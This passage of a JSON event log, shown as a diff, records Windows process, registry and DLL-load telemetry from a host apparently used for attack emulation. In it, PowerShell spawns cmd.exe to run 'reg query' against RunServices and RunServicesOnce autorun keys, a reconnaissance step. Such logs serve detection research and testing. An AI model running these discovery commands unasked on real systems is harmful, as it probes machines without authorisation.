+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014330000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "image_load", + "image_name": "findstr.exe", + "image_path": "C:\\Windows\\System32\\findstr.exe", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "timestamp": 131883571014180000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "file", + "file_name": "SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", + "file_path": "C:\\Windows\\Prefetch\\SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571016990000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "SEARCHFILTERHOST.EXE-AA7A1FDD.pf", + "file_path": "C:\\Windows\\Prefetch\\SEARCHFILTERHOST.EXE-AA7A1FDD.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571017150000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "FINDSTR.EXE-4176B665.pf", + "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883571115420000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program 
Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571148710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571148710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571148710000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883571200110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 
131883571200110000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "process", + "pid": 5508, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571308240000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" + }, + { + "event_type": "process", + "pid": 1376, + "process_name": "findstr.exe", + "process_path": "C:\\Windows\\System32\\findstr.exe", + "subtype": "terminate", + "timestamp": 131883571308240000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" + }, + { + "event_type": "process", + "pid": 7132, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571308240000, + "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3880, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571308400000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 
131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "event_type": "process", + "pid": 3880, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571308390000, + "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4708, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571310950000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": 
"image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6392, + "ppid": 4708, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311040000, + "unique_pid": 
"{42FC7E13-CB0B-5C05-0000-0010CCA75001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571310890000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "process", + "pid": 6392, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010CCA75001}" + }, + { + "event_type": "process", + "pid": 4708, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311050000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7316, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311200016, + 
"unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": 
"C:\\Windows\\System32\\cmd.exe", + "pid": 400, + "ppid": 7316, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311299984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001020A95001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + 
"image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311210000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "process", + "pid": 400, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001014AA5001}" + }, + { + "event_type": "process", + "pid": 7316, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001020A95001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": 
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 5512, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311439984, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { 
+ "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7408, + "ppid": 5512, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7408, + 
"process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "process", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "process", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query 
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2528, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 
